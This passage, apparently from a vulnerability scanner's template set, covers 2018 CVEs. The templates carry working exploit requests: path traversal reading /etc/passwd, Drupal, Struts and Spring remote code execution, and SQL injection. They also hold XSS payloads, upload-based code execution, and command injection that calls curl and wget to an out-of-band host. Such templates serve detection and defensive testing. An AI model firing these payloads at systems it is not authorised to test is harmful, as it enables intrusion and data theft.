File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7700","info":{"name":"DedeCMS 5.7SP2 - Cross-Site Request Forgery/Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/tag_test_action.php?url=a&token=&partcode={dede:field%20name=%27source%27%20runphp=%27yes%27}echo%20md5%28%22CVE-2018-7700%22%29%3B{/dede:field}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["4cc32a3a81d2bb37271934a48ce4468a"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16716","info":{"name":"NCBI ToolBox - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/blast/nph-viewgif.cgi?../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16288","info":{"name":"LG SuperSign EZ CMS 2.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/signEzUI/playlist/edit/upload/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12031","info":{"name":"Eaton Intelligent Power Manager 1.6 - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../etc/passwd","{{BaseURL}}/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../Windows/win.ini"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18264","info":{"name":"Kubernetes Dashboard <1.10.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs","{{BaseURL}}/k8s/api/v1/namespaces/kube-system/secrets/kubernetes-dashboard-certs"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["contains(body, \"apiVersion\") && contains(body, \"objectRef\")"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14013","info":{"name":"Synacor Zimbra Collaboration Suite Collaboration <8.8.11 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/zimbra/h/search?si=1&so=0&sfi=4&st=message&csi=1&action=&cso=0&id=%22%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3238","info":{"name":"Oracle Fusion Middleware WebCenter Sites 11.1.1.8.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /cs/Satellite?pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/complexassetmaker&cs_imagedir=qqq\"><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FNoXceleditor&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /cs/Satellite?pagename=OpenMarket%2FXcelerate%2FActions%2FSecurity%2FProcessLoginRequest&WemUI=qqq%27;}%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n"],"stop-at-first-match":true,"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["<script>alert(document.domain)</script>/graphics/common/screen/dotclear.gif"]},{"type":"word","part":"body","words":["<script>alert(document.domain)</script>","Variables.cs_imagedir"],"condition":"and"}]}]},{"id":"CVE-2018-10735","info":{"name":"NagiosXI <= 5.4.12 `commandline.php` SQL injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nagiosql/admin/commandline.php?cname=%27%20union%20select%20concat(md5({{num}}))%23"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-7600","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1\nHost:  {{Hostname}}\nAccept: application/json\nReferer:  {{Hostname}}/user/register\nX-Requested-With: XMLHttpRequest\nContent-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663\n\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#post_render][]\"\n\npassthru\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#type]\"\n\nmarkup\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"mail[#markup]\"\n\ncat /etc/passwd\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"form_id\"\n\nuser_register_form\n-----------------------------99533888113153068481322586663\nContent-Disposition: form-data; name=\"_drupal_ajax\"\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17422","info":{"name":"DotCMS < 5.0.2 - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/common/forward_js.jsp?FORWARD_URL=http://oast.me","{{BaseURL}}/html/portlet/ext/common/page_preview_popup.jsp?hostname=oast.me"],"stop-at-first-match":true,"matchers":[{"type":"word","part":"body","words":["self.location = 'http://oast.me'","location.href = 'http\\x3a\\x2f\\x2fwww\\x2eoast\\x2eme'"]}]}]},{"id":"CVE-2018-1273","info":{"name":"Spring Data Commons - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /account HTTP/1.1\nHost: {{Hostname}}\nConnection: close\nContent-Type: application/x-www-form-urlencoded\n\nname[#this.getClass().forName('java.lang.Runtime').getRuntime().exec('{{url_encode(command)}}')]={{to_lower(rand_text_alpha(5))}}\n"],"payloads":{"command":["cat /etc/passwd","type C:\\/Windows\\/win.ini"]},"matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","\\[(font|extension|file)s\\]"],"condition":"or"}]}]},{"id":"CVE-2018-1000533","info":{"name":"GitList < 0.6.0 Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET / HTTP/1.1\nHost: {{Hostname}}\n","POST /{{path}}/tree/a/search HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nquery=--open-files-in-pager=cat%20/etc/passwd\n"],"matchers":[{"type":"word","part":"body","words":["root:/root:/bin/bash"]}],"extractors":[{"type":"regex","name":"path","group":1,"regex":["<span class=\"name\">(.*?)</span>"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20470","info":{"name":"Tyto Sahi pro 7.x/8.x - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_s_/dyn/Log_highlight?href=../../../../windows/win.ini&n=1#selected"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000226","info":{"name":"Cobbler - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST {{BaseURL}}/cobbler_api HTTP/1.1\nHost: {{Hostname}}\nContent-Type: text/xml\n\n<?xml version='1.0'?>\n<methodCall>\n  <methodName>_CobblerXMLRPCInterface__make_token</methodName>\n  <params>\n    <param>\n      <value>\n        <string>cobbler</string>\n      </value>\n    </param>\n  </params>\n</methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(body), '<name>faultCode</name>')"]},{"type":"word","part":"header","words":["Content-Type: text/xml"]},{"type":"word","part":"body","words":["<methodResponse>"]},{"type":"regex","part":"body","regex":["(.*[a-zA-Z0-9].+==)</string></value>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11776","info":{"name":"Apache Struts2 S2-057 - Remote Code Execution","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/%24%7B%28%23_memberAccess%5B%22allowStaticMethodAccess%22%5D%3Dtrue%2C%23a%3D@java.lang.Runtime@getRuntime%28%29.exec%28%27cat%20/etc/passwd%27%29.getInputStream%28%29%2C%23b%3Dnew%20java.io.InputStreamReader%28%23a%29%2C%23c%3Dnew%20%20java.io.BufferedReader%28%23b%29%2C%23d%3Dnew%20char%5B51020%5D%2C%23c.read%28%23d%29%2C%23sbtest%3D@org.apache.struts2.ServletActionContext@getResponse%28%29.getWriter%28%29%2C%23sbtest.println%28%23d%29%2C%23sbtest.close%28%29%29%7D/actionChain1.action"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-9995","info":{"name":"TBK DVR4104/DVR4216 Devices - Authentication Bypass","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/device.rsp?opt=user&cmd=list"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"uid\":","\"pwd\":","\"view\":","playback"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6530","info":{"name":"D-Link - Unauthenticated Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /soap.cgi?service=whatever-control;curl {{interactsh-url}};whatever-invalid-shell HTTP/1.1\nHost: {{Hostname}}\nAccept-Encoding: identity\nSOAPAction: \"whatever-serviceType#whatever-action\"\nContent-Type: text/xml\n\nwhatever-content\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2018-0127","info":{"name":"Cisco RV132W/RV134W Router - Information Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/dumpmdm.cmd"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Dump","MDM","cisco","admin"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5233","info":{"name":"Grav CMS <1.3.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/tools/a--%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"body","words":["/themes/grav","Grav Admin Login","data-grav-"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18777","info":{"name":"Microstrategy Web 7 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/WebMstr7/servlet/mstrWeb?evt=3045&src=mstrWeb.3045&subpage=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3167","info":{"name":"Oracle E-Business Suite - Blind SSRF","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/OA_HTML/lcmServiceController.jsp"],"body":"<!DOCTYPE root PUBLIC \"-//B/A/EN\" \"http://interact.sh\">","matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Unexpected text in DTD"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16763","info":{"name":"FUEL CMS 1.4.1 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18570","info":{"name":"Planon <Live Build 41 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wicket/resource/nl.planon.pssm.dashboard.cre.engine.wicket.page.AbstractDashboardPage/html/nodata.html?nodatamsg=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12675","info":{"name":"SV3C HD Camera L Series - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/web/cgi-bin/hi3510/param.cgi?cmd=setmobilesnapattr&cururl=http%3A%2F%2Finteract.sh"],"matchers":[{"type":"word","part":"body","words":["<META http-equiv=\"Refresh\" content=\"0;URL=http://interact.sh\">"]}]}]},{"id":"CVE-2018-14728","info":{"name":"Responsive filemanager 9.13.1 Server-Side Request Forgery","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/filemanager/upload.php"],"body":"fldr=&url=file:///etc/passwd","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-13379","info":{"name":"Fortinet FortiOS - Credentials Disclosure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/remote/fgt_lang?lang=/../../../..//////////dev/cmdb/sslvpn_websession"],"matchers":[{"type":"regex","part":"body","regex":["^var fgt_lang ="]}]}]},{"id":"CVE-2018-11473","info":{"name":"Monstra CMS 3.0.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /users/registration HTTP/1.1\nHost: {{Hostname}}\n","POST /users/registration HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\ncsrf={{csrf}}&login=test&password=%22%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&email=teest%40gmail.com&answer=test&register=Register\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><script>alert(document.domain)</script>","Monstra"],"case-insensitive":true,"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"csrf","group":1,"regex":["id=\"csrf\" name=\"csrf\" value=\"(.*)\">"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-18778","info":{"name":"ACME mini_httpd <1.30 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}"],"matchers":[{"type":"word","part":"header","words":["Server: mini_httpd"],"internal":true}]},{"raw":["GET /etc/passwd HTTP/1.1\nHost:\n\n"],"unsafe":true,"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19458","info":{"name":"PHP Proxy 3.0.3 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?q=file:///etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11759","info":{"name":"Apache Tomcat JK Connect <=1.2.44 - Manager Access","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/jkstatus","{{BaseURL}}/jkstatus;"],"matchers-condition":"and","matchers":[{"type":"word","words":["JK Status Manager"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20009","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/ssl-provider.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_ssl_provider=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=&new_notes=\n","GET /assets/ssl-providers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-14574","info":{"name":"Django - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}//www.interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["Location: https://www.interact.sh","Location: http://www.interact.sh"]},{"type":"status","status":[301]}]}]},{"id":"CVE-2018-10141","info":{"name":"Palo Alto Networks PAN-OS GlobalProtect <8.1.4 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/global-protect/login.esp?user=j%22;-alert(1)-%22x"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var valueUser = \"j\";-alert(1)-\"x\";"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-11409","info":{"name":"Splunk <=7.0.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/en-US/splunkd/__raw/services/server/info/server-info?output_mode=json","{{BaseURL}}/__raw/services/server/info/server-info?output_mode=json"],"matchers-condition":"and","matchers":[{"type":"word","words":["licenseKeys"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10562","info":{"name":"Dasan GPON Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`busybox+curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;busybox wget http://{{interactsh-url}}&ipv=0\n","POST /GponForm/diag_Form?images/ HTTP/1.1\nHost: {{Hostname}}\n\nXWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`curl+http%3a//{{interactsh-url}}+-H+'User-Agent%3a+{{useragent}}'`;wget http://{{interactsh-url}}&ipv=0\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-14064","info":{"name":"VelotiSmart Wifi - Directory Traversal","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12054","info":{"name":"Schools Alert Management Script - Arbitrary File Read","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/img.php?f=/./etc/./passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20526","info":{"name":"Roxy Fileman 1.4.5 - Unrestricted File Upload","severity":"critical"},"requests":[{"raw":["POST /php/upload.php HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nContent-Type: multipart/form-data; boundary=----WebKitFormBoundary20kgW2hEKYaeF5iP\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.5112.81 Safari/537.36\nOrigin: {{BaseURL}}\nReferer: {{BaseURL}}\nAccept-Encoding: gzip, deflate\nAccept-Language: en-GB,en-US;q=0.9,en;q=0.8\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"action\"\n\nupload\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"method\"\n\najax\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"d\"\n\n/Uploads\n------WebKitFormBoundary20kgW2hEKYaeF5iP\nContent-Disposition: form-data; name=\"files[]\"; filename=\"{{randstr}}.php7\"\nContent-Type: application/octet-stream\n\n<?php\necho md5('CVE-2018-20526');\n?>\n\n------WebKitFormBoundary20kgW2hEKYaeF5iP--\n","GET /Uploads/{{randstr}}.php7 HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["f76d6a5f7491700cc3a678bdba2902d3"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18608","info":{"name":"DedeCMS 5.7 SP2 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plus/feedback.php/rp4hu%27><script>alert%28document.domain%29<%2fscript>?aid=3"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["'><script>alert(document.domain)</script>","DedeCMS Error Warning!"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15961","info":{"name":"Adobe ColdFusion - Unrestricted File Upload Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/upload.cfm HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=---------------------------24464570528145\n\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"file\"; filename=\"{{randstr}}.jsp\"\nContent-Type: image/jpeg\n\n<%@ page import=\"java.util.*,java.io.*\"%>\n<%@ page import=\"java.security.MessageDigest\"%>\n<%\nString cve = \"CVE-2018-15961\";\nMessageDigest alg = MessageDigest.getInstance(\"MD5\");\nalg.reset();\nalg.update(cve.getBytes());\nbyte[] digest = alg.digest();\nStringBuffer hashedpasswd = new StringBuffer();\nString hx;\nfor (int i=0;i<digest.length;i++){\n  hx =  Integer.toHexString(0xFF & digest[i]);\n  if(hx.length() == 1){hx = \"0\" + hx;}\n  hashedpasswd.append(hx);\n}\nout.println(hashedpasswd.toString());\n%>\n-----------------------------24464570528145\nContent-Disposition: form-data; name=\"path\"\n\n{{randstr}}.jsp\n-----------------------------24464570528145--\n","GET /cf_scripts/scripts/ajax/ckeditor/plugins/filemanager/uploadedFiles/{{randstr}}.jsp HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","words":["ddbb3e76f92e78c445c8ecb392beb225"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6910","info":{"name":"DedeCMS 5.7 - Path Disclosure","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/include/downmix.inc.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["downmix.inc.php","Call to undefined function helper()"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-20011","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/category.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_category=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_stakeholder=&new_notes=\n","GET /assets/categories.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["status_code_3 == 200","contains(header_3, \"text/html\")","contains(body_3, \"><script>alert(document.domain)</script></a>\")"],"condition":"and"}]}]},{"id":"CVE-2018-20462","info":{"name":"WordPress JSmol2WP <=1.07 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /wp-content/plugins/jsmol2wp/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"word","internal":true,"words":["JSmol2WP","Tags:"],"condition":"and"}]},{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/jsmol2wp/php/jsmol.php?isform=true&call=saveFile&data=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&mimetype=text/html;%20charset=utf-8"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18069","info":{"name":"WordPress sitepress-multilingual-cms 3.6.3 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/admin.php"],"body":"icl_post_action=save_theme_localization&locale_file_name_en=EN\"><script>alert(0);</script>\n","host-redirects":true,"max-redirects":2,"matchers":[{"type":"dsl","dsl":["contains(tolower(header), \"text/html\")","contains(set_cookie, \"_icl_current_admin_language\")","contains(body, \"\\\"><script>alert(0);</script>\")"],"condition":"and"}]}]},{"id":"CVE-2018-7314","info":{"name":"Joomla! Component PrayerCenter 3.0.2 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_prayercenter&task=confirm&id=1&sessionid=1' AND EXTRACTVALUE(22,CONCAT(0x7e,md5({{num}})))-- X"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1000130","info":{"name":"Jolokia Agent - JNDI Code Injection","severity":"high"},"requests":[{"raw":["POST /jolokia/read/getDiagnosticOptions HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.\nContent-Type: application/x-www-form-urlencoded\n\n{\n   \"type\":\"read\",\n   \"mbean\":\"java.lang:type=Memory\",\n   \"target\":{\n      \"url\":\"service:jmx:rmi:///jndi/ldap://127.0.0.1:1389/o=tomcat\"\n   }\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Failed to retrieve RMIServer stub: javax.naming.CommunicationException: 127.0.0.1:1389"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10823","info":{"name":"D-Link Routers - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/chkisg.htm%3FSip%3D1.1.1.1%20%7C%20cat%20%2Fetc%2Fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14916","info":{"name":"Loytec LGATE-902 <6.4.2 - Local File Inclusion","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17153","info":{"name":"Western Digital MyCloud NAS - Authentication Bypass","severity":"critical"},"requests":[{"raw":["POST /web/google_analytics.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: 